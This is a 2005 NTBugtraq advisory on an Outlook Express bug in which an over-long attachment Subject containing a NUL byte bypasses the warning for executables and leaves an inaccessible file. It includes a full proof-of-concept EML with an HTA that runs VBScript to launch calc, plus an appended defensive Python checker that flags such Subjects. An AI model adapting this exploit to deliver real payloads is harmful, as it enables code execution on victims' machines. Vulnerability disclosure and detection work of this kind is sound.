Microsoft Windows - Filesystem bug allows various things

From: Benjamin Tobias Franz (0-1-2-3_at_GMX.DE)
Date: 06/03/05

    Date: Fri, 3 Jun 2005 16:30:21 +0200
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    Microsoft Windows - Filesystem bug allows various things

    Description:
    A bug in Microsoft Windows can be exploited to create files which cannot
    be accessed by ("normal") programs or by Windows itself. You cannot access
    (open, rename, delete, ...) such files. The file properties cannot be read
    or changed either. To create such files an attacker must send a specially
    formed email to a victim, and the victim must open an attachment (e.g. a
    text file; but I'm sure there is a way to create such files remotely
    without opening attachments).

    The weakness can also be exploited by malicious people to trick users into
    opening a malicious attachment:
    Microsoft Outlook Express will open any executable attachment without
    showing the correct warning message (for software) and the real type of the
    file if an email is specially formed and the OE option to block attachments
    which could contain viruses is disabled (many users have disabled this). OE
    will only show its normal (warning) message.

    Proof-of-Concept exploit (save as EML file):
    ===>>> PoC - Start <<<===
    From:"Benjamin Tobias Franz"<0-1-2-3@gmx.de>
    To:You
    Subject:MSOE - Attachment Download Security Restriction Bypass
    Date:Wed, 1 Jun 2005
    Content-Type:multipart/mixed;boundary="btf"

    --btf
    Content-Type: text/plain;

    Open the attachment and you will see:
    1. MS OE will not show the correct warning message (for software)
    2. MS OE will not show any file type
    3. MS OE will create a non-accessible file

    Regards,

    Benjamin Tobias Franz
    Germany
    --btf
    Content-Type:message/rfc822
    Content-Transfer-Encoding:quoted-printable

    <!--
    Subject:BTF's MSOE Attachment Download Security Restriction Bypass=
    .hta=00.btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
    btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
    btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
    btfbtf
    -->
    <title>YOU ARE VULNERABLE</title>
    <script language=3Dvbscript>set btf=3Dcreateobject("wscript.shell")
    btf.run("calc")</script><body style=3D"background-color:red;font-si=
    ze:40px;"><b>YOU ARE VULNERABLE (If you do not see this =
    message in an email-message window)!!!</b><br><br><br>Regards,
    <br><br>Benjamin Tobias Franz<br>Germany</body>
    --btf--

    ===>>> PoC - End <<<===

    Technical details:
    When Microsoft Outlook Express finds an attachment with content-type
    "message/rfc822" and no file name is specified, it will use the subject of
    the attached message as the file name. To exploit this, the subject must
    contain more than 255 chars and end with: file extension + binary 0 + dot +
    anything. So the file will not be opened as an EML file, but the included
    file extension (before the binary 0) will be used to determine the program
    to open it with (but not to detect the file type).
    The created file will be saved in a subdirectory of the directory "Content.IE5"
    (you can open it by running "C:\Documents and Settings\*Your Username*\Local
    Settings\Temporary Internet Files\Content.IE5\"). You can find the file by
    searching in this directory (and its subdirectories) for files which include
    "BTF's MSOE Attachment Download Security Restriction Bypass" in their name.
    You will find a file displayed as a hidden system file, and you cannot
    access or delete it.

    Affected software:
    Microsoft Windows

    Workaround:
    -

    Date of discovery:
    1 June 2005

    Tested software:
    Fully patched system running Windows XP SP2.
    Microsoft Outlook Express 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

    DLL versions:
    MSOE.DLL: 6.00.2900.2527 (xpsp_sp2_gdr.040919-1056)
    MSOERES.DLL: 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

    Regards,

    Benjamin Tobias Franz
    Germany

    --
    NTBugtraq Editor's Note:
    Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
    --
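As an added defensive illustration (not part of the original post and not Microsoft code): a Python checker that undoes the quoted-printable encoding of a nameless message/rfc822 part and inspects the embedded Subject for the two traits the technical details describe, a length over 255 and a NUL followed by a dot. The sample mail it builds is constructed and carries only plain text; all function names and sample values are assumptions.

```python
import email
import quopri
import re

def mime_parts(eml: bytes):
    # Hand-split top-level parts: the email module would parse a message/rfc822
    # part before undoing its transfer encoding, mangling a QP-encoded Subject.
    head, _, body = eml.replace(b"\r\n", b"\n").partition(b"\n\n")
    m = re.search(rb'boundary="?([^";\s]+)"?', head, re.I)
    for chunk in body.split(b"--" + m.group(1))[1:] if m else []:
        if chunk.startswith(b"--"):  # closing delimiter
            break
        yield chunk.lstrip(b"\n").partition(b"\n\n")[::2]  # (headers, body)

def inner_subject(raw: bytes, cte: str) -> bytes:
    # Undo quoted-printable (soft breaks, =00 -> NUL), then return the unfolded
    # Subject from the embedded message's header block.
    if cte.lower() == "quoted-printable":
        raw = quopri.decodestring(raw)
    m = re.search(rb"^subject:[ \t]*(.*(?:\n[ \t].*)*)", raw.partition(b"\n\n")[0], re.I | re.M)
    return m.group(1).replace(b"\n", b"") if m else b""

def analyze_name(subject: bytes) -> dict:
    # How the Subject would behave as a file name; 255 is the advisory's length threshold.
    nul = subject.find(b"\x00")
    visible = subject if nul < 0 else subject[:nul]
    ext = visible.rsplit(b".", 1)[-1] if b"." in visible else b""
    return {"length": len(subject), "over_limit": len(subject) > 255,
            "embedded_nul": nul >= 0, "ext_before_nul": ext.decode("latin-1"),
            "dot_after_nul": nul >= 0 and subject[nul + 1:nul + 2] == b"."}

def suspicious_rfc822_parts(eml: bytes) -> list:
    # Nameless message/rfc822 parts whose Subject is over-long or has a NUL (either is anomalous).
    findings = []
    for ph, pb in mime_parts(eml):
        hdr = email.message_from_bytes(ph)
        if hdr.get_content_type() != "message/rfc822" or hdr.get_filename():
            continue
        info = analyze_name(inner_subject(pb, hdr.get("Content-Transfer-Encoding", "7bit")))
        if info["over_limit"] or info["embedded_nul"]:
            info["matches_advisory_pattern"] = info["over_limit"] and info["dot_after_nul"]
            findings.append(info)
    return findings

def build_sample(subject: bytes) -> bytes:
    # Constructed sample (not the advisory's PoC): nameless QP-encoded message/rfc822 part, text only.
    inner = b"Subject: " + subject + b"\n\nconstructed body, plain text only\n"
    return (b'Content-Type: multipart/mixed; boundary="x1"\n\n--x1\nContent-Type: text/plain\n\n'
            b"see attached message\n--x1\nContent-Type: message/rfc822\n"
            b"Content-Transfer-Encoding: quoted-printable\n\n" + quopri.encodestring(inner) + b"--x1--\n")
```

Calling `suspicious_rfc822_parts(build_sample(b"report.txt\x00." + b"A" * 300))` returns one finding with `ext_before_nul == "txt"` and `matches_advisory_pattern` set, while an ordinary short Subject yields none.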